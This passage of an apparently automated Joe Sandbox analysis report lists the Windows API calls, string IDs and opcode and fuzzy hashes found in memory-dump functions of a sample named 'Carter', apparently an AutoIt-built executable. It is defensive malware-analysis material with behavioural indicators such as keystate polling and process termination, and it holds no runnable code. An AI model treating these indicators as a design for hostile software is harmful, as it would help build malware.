                                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 01039264
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                        • String ID:
                                                                        • API String ID: 1413079979-0
                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 0103C34E
                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0103C35F
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0103C366
                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0103C36E
                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0103C385
                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0103C397
                                                                        Similarity
                                                                        • API ID: CapsDevice$Release
                                                                        • String ID:
                                                                        • API String ID: 1035833867-0
                                                                        APIs
                                                                          • Part of subcall function 00FE16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FE1729
                                                                          • Part of subcall function 00FE16CF: SelectObject.GDI32(?,00000000), ref: 00FE1738
                                                                          • Part of subcall function 00FE16CF: BeginPath.GDI32(?), ref: 00FE174F
                                                                          • Part of subcall function 00FE16CF: SelectObject.GDI32(?,00000000), ref: 00FE1778
                                                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0106C57C
                                                                        • LineTo.GDI32(00000000,00000003,?), ref: 0106C590
                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0106C59E
                                                                        • LineTo.GDI32(00000000,00000000,?), ref: 0106C5AE
                                                                        • EndPath.GDI32(00000000), ref: 0106C5BE
                                                                        • StrokePath.GDI32(00000000), ref: 0106C5CE
                                                                        Similarity
                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                        • String ID:
                                                                        • API String ID: 43455801-0
                                                                        APIs
                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 010007EC
                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 010007F4
                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 010007FF
                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0100080A
                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 01000812
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0100081A
                                                                        Similarity
                                                                        • API ID: Virtual
                                                                        • String ID:
                                                                        • API String ID: 4278518827-0
                                                                        APIs
                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 010459B4
                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 010459CA
                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 010459D9
                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 010459E8
                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 010459F2
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 010459F9
                                                                        Similarity
                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                        • String ID:
                                                                        • API String ID: 839392675-0
                                                                        APIs
                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 010477FE
                                                                        • EnterCriticalSection.KERNEL32(?,?,00FEC2B6,?,?), ref: 0104780F
                                                                        • TerminateThread.KERNEL32(00000000,000001F6,?,00FEC2B6,?,?), ref: 0104781C
                                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00FEC2B6,?,?), ref: 01047829
                                                                          • Part of subcall function 010471F0: CloseHandle.KERNEL32(00000000,?,01047836,?,00FEC2B6,?,?), ref: 010471FA
                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0104783C
                                                                        • LeaveCriticalSection.KERNEL32(?,?,00FEC2B6,?,?), ref: 01047843
                                                                        Similarity
                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                        • String ID:
                                                                        • API String ID: 3495660284-0
                                                                        APIs
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 01039555
                                                                        • UnloadUserProfile.USERENV(?,?), ref: 01039561
                                                                        • CloseHandle.KERNEL32(?), ref: 0103956A
                                                                        • CloseHandle.KERNEL32(?), ref: 01039572
                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0103957B
                                                                        • HeapFree.KERNEL32(00000000), ref: 01039582
                                                                        Similarity
                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                        • String ID:
                                                                        • API String ID: 146765662-0
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(?), ref: 01058CFD
                                                                        • CharUpperBuffW.USER32(?,?), ref: 01058E0C
                                                                        • VariantClear.OLEAUT32(?), ref: 01058F84
                                                                          • Part of subcall function 01047B1D: VariantInit.OLEAUT32(00000000), ref: 01047B5D
                                                                          • Part of subcall function 01047B1D: VariantCopy.OLEAUT32(00000000,?), ref: 01047B66
                                                                          • Part of subcall function 01047B1D: VariantClear.OLEAUT32(00000000), ref: 01047B72
                                                                        Similarity
                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                        • API String ID: 4237274167-1221869570
                                                                        APIs
                                                                          • Part of subcall function 00FF436A: _wcscpy.LIBCMT ref: 00FF438D
                                                                        • _memset.LIBCMT ref: 0104332E
                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0104335D
                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 01043410
                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0104343E
                                                                        Similarity
                                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                        • String ID: 0
                                                                        • API String ID: 4152858687-4108050209
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 01042F67
                                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 01042F83
                                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 01042FC9
                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,010A7890,00000000), ref: 01043012
                                                                        Similarity
                                                                        • API ID: Menu$Delete$InfoItem_memset
                                                                        • String ID: 0
                                                                        • API String ID: 1173514356-4108050209
APIs
  • Part of subcall function 00FF1A36: _memmove.LIBCMT ref: 00FF1A77
  • Part of subcall function 0103B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0103B7BD
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 01039ACC
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 01039ADF
• SendMessageW.USER32(?,00000189,?,00000000), ref: 01039B0F
  • Part of subcall function 00FF1821: _memmove.LIBCMT ref: 00FF185B
Memory Dump Source
• Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
Similarity
• API ID: MessageSend$_memmove$ClassName
• String ID: ComboBox$ListBox
• API String ID: 365058703-1403004172
• Opcode ID: b48196a03336751a798b0a934b2500cdfa5d6630a78b77337b0a04c04f609193
• Instruction ID: 80a72f7c6436b08161090319676827579b6b0c495d43146d455bb4f1ef425f96
• Opcode Fuzzy Hash: b48196a03336751a798b0a934b2500cdfa5d6630a78b77337b0a04c04f609193
• Instruction Fuzzy Hash: B6212875A00108BEEF28EBA4CC85CFFBBACEF95354F104219F9A1A71E4DB7949059650
APIs
  • Part of subcall function 00FE2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FE214F
  • Part of subcall function 00FE2111: GetStockObject.GDI32(00000011), ref: 00FE2163
  • Part of subcall function 00FE2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FE216D
• SendMessageW.USER32(00000000,00000467,00000000,?), ref: 01066A86
• LoadLibraryW.KERNEL32(?), ref: 01066A8D
• SendMessageW.USER32(?,00000467,00000000,00000000), ref: 01066AA2
• DestroyWindow.USER32(?), ref: 01066AAA
Memory Dump Source
• Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
Similarity
• API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
• String ID: SysAnimate32
• API String ID: 4146253029-1011021900
• Opcode ID: 42134fc917f804f60ffd2cb93dfdaeb0b5c6332f3b3d379824dd9024bd292811
• Instruction ID: 887b5a99047fff930db8d339752ee4e0e851dc4c279fe79a1dda6c527d76ed6f
• Opcode Fuzzy Hash: 42134fc917f804f60ffd2cb93dfdaeb0b5c6332f3b3d379824dd9024bd292811
• Instruction Fuzzy Hash: A821AE71600205AFEF618E6ADC81EBF77EDEF49324F108619FA91A2181D373DC519BA0
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 01047377
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 010473AA
• GetStdHandle.KERNEL32(0000000C), ref: 010473BC
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 010473F6
Memory Dump Source
• Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
• Opcode ID: f3d6e0a0d125c45e01d5aa0a25418dfce40d26b44aaf237641197e3f5afd7485
• Instruction ID: cbbd82198bd341e68328dc6e78e0608f54afde3fa0ec9021af701e8320655972
• Opcode Fuzzy Hash: f3d6e0a0d125c45e01d5aa0a25418dfce40d26b44aaf237641197e3f5afd7485
• Instruction Fuzzy Hash: C521B2B1500306ABDB209F69D885A9A7BE8AF45721F208A79FDE0E72D0D771D850CB51
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 01047444
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01047476
• GetStdHandle.KERNEL32(000000F6), ref: 01047487
• CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 010474C1
Memory Dump Source
• Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
• Opcode ID: c46aab477c91c9f988e9187ec4cb5c222eb6525a2ebd0a3af56aa623e90447e9
• Instruction ID: 04e1bee7d4abf8f0c803aaa3646738b180208a9a682a21bef4b76c18478319d7
• Opcode Fuzzy Hash: c46aab477c91c9f988e9187ec4cb5c222eb6525a2ebd0a3af56aa623e90447e9
• Instruction Fuzzy Hash: EA21B8B1500306ABDB209F6C9884EAA7BE8AF95730F100B69FEE0E72D0DF719451C751
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0104B297
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0104B2EB
• __swprintf.LIBCMT ref: 0104B304
• SetErrorMode.KERNEL32(00000000,00000001,00000000,01070980), ref: 0104B342
Memory Dump Source
• Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
Similarity
• API ID: ErrorMode$InformationVolume__swprintf
• String ID: %lu
• API String ID: 3164766367-685833217
• Opcode ID: d74b9225cbe2fdc2844cfc48191217d203855f162d62fd983ddb6101fcd6ae24
• Instruction ID: 9f3b5e1fd21630349570130e4e55012351c1923c58feaf478edbc29a879183db
• Opcode Fuzzy Hash: d74b9225cbe2fdc2844cfc48191217d203855f162d62fd983ddb6101fcd6ae24
• Instruction Fuzzy Hash: E5218375A00209AFCB10DFA5CC84DEEB7B8EF89714B008069F945EB251DB35EA41DB61
APIs
  • Part of subcall function 00FF1821: _memmove.LIBCMT ref: 00FF185B
  • Part of subcall function 0103AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0103AA6F
  • Part of subcall function 0103AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 0103AA82
  • Part of subcall function 0103AA52: GetCurrentThreadId.KERNEL32 ref: 0103AA89
  • Part of subcall function 0103AA52: AttachThreadInput.USER32(00000000), ref: 0103AA90
• GetFocus.USER32 ref: 0103AC2A
  • Part of subcall function 0103AA9B: GetParent.USER32(?), ref: 0103AAA9
• GetClassNameW.USER32(?,?,00000100), ref: 0103AC73
• EnumChildWindows.USER32(?,0103ACEB), ref: 0103AC9B
• __swprintf.LIBCMT ref: 0103ACB5
Memory Dump Source
• Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
Similarity
• API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
• String ID: %s%d
• API String ID: 1941087503-1110647743
• Opcode ID: 214fcbebaa4c6739f3e15480af6347a6780b93995f7bc68aadadfa8f798be418
• Instruction ID: f42ff2a0ef8503c77066a6d8c6c5d101a59ac3cd861b6b415cff69110d983e3e
• Opcode Fuzzy Hash: 214fcbebaa4c6739f3e15480af6347a6780b93995f7bc68aadadfa8f798be418
• Instruction Fuzzy Hash: 1311CD75A00209EBDF11AFA08D84FEA77ACAF89700F0040B9BAC8EB141CB7559459B70
APIs
• CharUpperBuffW.USER32(?,?), ref: 01042318
Memory Dump Source
• Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
Similarity
• API ID: BuffCharUpper
• String ID: APPEND$EXISTS$KEYS$REMOVE
• API String ID: 3964851224-769500911
• Opcode ID: d1fd947e568fe1c587c8e14f47a43032a32ce652440d80e9d3c1a043443aa531
• Instruction ID: 5fc4c45b4ce729192298d1686b90f06987bec78c58300e044efaff0ff5751abe
• Opcode Fuzzy Hash: d1fd947e568fe1c587c8e14f47a43032a32ce652440d80e9d3c1a043443aa531
• Instruction Fuzzy Hash: 371161B0A0011DEFCF10EF54E9909FEB7B4FF16244F5084A9E894672A5EB325906DF50
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0105F2F0
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 0105F320
• GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0105F453
• CloseHandle.KERNEL32(?), ref: 0105F4D4
Memory Dump Source
• Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
Similarity
• API ID: Process$CloseCountersHandleInfoMemoryOpen
• String ID:
• API String ID: 2364364464-0
• Opcode ID: 20f3e46430f65e375e70e6dff2b60dc97024a4b20f54a5776a5b62f4ca1b2122
• Instruction ID: e888764bf376631ce97ab9a3cf0bcbf75c6cbba6c9111059c76e9c24e3cf3254
• Opcode Fuzzy Hash: 20f3e46430f65e375e70e6dff2b60dc97024a4b20f54a5776a5b62f4ca1b2122
• Instruction Fuzzy Hash: 868194716007019FD760EF29DC46F2BB7E5AF44710F04895DFA99DB292DB74AC018B52
APIs
  • Part of subcall function 00FF1A36: _memmove.LIBCMT ref: 00FF1A77
  • Part of subcall function 0106147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0106040D,?,?), ref: 01061491
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0106075D
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0106079C
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 010607E3
• RegCloseKey.ADVAPI32(?,?), ref: 0106080F
• RegCloseKey.ADVAPI32(00000000), ref: 0106081C
Memory Dump Source
• Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
• String ID:
• API String ID: 3440857362-0
• Opcode ID: cb2804ddcb74afb1210b0662a06fb57e3ac1f932ddccb19d9b09d174f51efcf0
• Instruction ID: 6319efbe862791783eb7eab295b0b16fe30742334dc58854239d76a4c28da627
• Opcode Fuzzy Hash: cb2804ddcb74afb1210b0662a06fb57e3ac1f932ddccb19d9b09d174f51efcf0
• Instruction Fuzzy Hash: A3518A71608209AFD714EF68CC81E6EB7E9FF84314F00891DF695872A5DB39E905CB92
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0104EC62
• GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0104EC8B
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0104ECCA
  • Part of subcall function 00FE4D37: __itow.LIBCMT ref: 00FE4D62
  • Part of subcall function 00FE4D37: __swprintf.LIBCMT ref: 00FE4DAC
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0104ECEF
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0104ECF7
Memory Dump Source
• Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
Similarity
• API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
• String ID:
• API String ID: 1389676194-0
• Opcode ID: 9b8520ce234abeba44c5870ed6a1752722135e38e258239a619ebd915f6dbaa0
• Instruction ID: 618a15b9d976fb9adc09421e25d2ccab4a417dc38246deebddd2826d50507d17
• Opcode Fuzzy Hash: 9b8520ce234abeba44c5870ed6a1752722135e38e258239a619ebd915f6dbaa0
• Instruction Fuzzy Hash: 6C513975A00109DFDB11EF65C981AAEBBF5FF08314F1480A9E989AB3A1CB35ED01DB50
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                         • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b5c3e88dc44253162c6a47934878b79273d42833d896547b2a2fdc280214adcd
                                                                        • Instruction ID: 3380efa55d66ff64c1695a48b32512947bbf7217d36cb9a5355d426aea1ea24b
                                                                        • Opcode Fuzzy Hash: b5c3e88dc44253162c6a47934878b79273d42833d896547b2a2fdc280214adcd
                                                                        • Instruction Fuzzy Hash: 1741C375A00114EFE760EA28CC84FA9BBFCFB0A310F054295FA97B72D1C679A941CB50
                                                                        APIs
                                                                        • GetCursorPos.USER32(?), ref: 00FE2727
                                                                        • ScreenToClient.USER32(010A77B0,?), ref: 00FE2744
                                                                        • GetAsyncKeyState.USER32(00000001), ref: 00FE2769
                                                                        • GetAsyncKeyState.USER32(00000002), ref: 00FE2777
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                         • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                        • String ID:
                                                                        • API String ID: 4210589936-0
                                                                        • Opcode ID: 3ff7275e8f1da99264d1bdc5bd03aed06de3df16b83a6ae61ded5b6223982e54
                                                                        • Instruction ID: 330ec26039eb794e8be024fa9edf1df00d597ba9378ed18942c2516d31480234
                                                                        • Opcode Fuzzy Hash: 3ff7275e8f1da99264d1bdc5bd03aed06de3df16b83a6ae61ded5b6223982e54
                                                                        • Instruction Fuzzy Hash: 8B41E471904109FFDF599F69C944EEDBBB8FB05330F108359F868A2294D735AA50DB90
                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 010395E8
                                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 01039692
                                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0103969A
                                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 010396A8
                                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 010396B0
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                         • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                         • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePostSleep$RectWindow
                                                                        • String ID:
                                                                        • API String ID: 3382505437-0
                                                                        • Opcode ID: 6aea77aab84051601d274a5b641345866b86349cd15205c5a97819bc063bf244
                                                                        • Instruction ID: efe6f894657ff734fd6c8bcf799fbd57c7c4e6b3e95af551bae4af9fa51bd43c
                                                                        • Opcode Fuzzy Hash: 6aea77aab84051601d274a5b641345866b86349cd15205c5a97819bc063bf244
                                                                        • Instruction Fuzzy Hash: 5D31FF31900219EFDF10CF68D94CA9E3BB9FB89329F104258F9A4EB2C5C3B09910DB90
                                                                        APIs
                                                                        • IsWindowVisible.USER32(?), ref: 0103BD9D
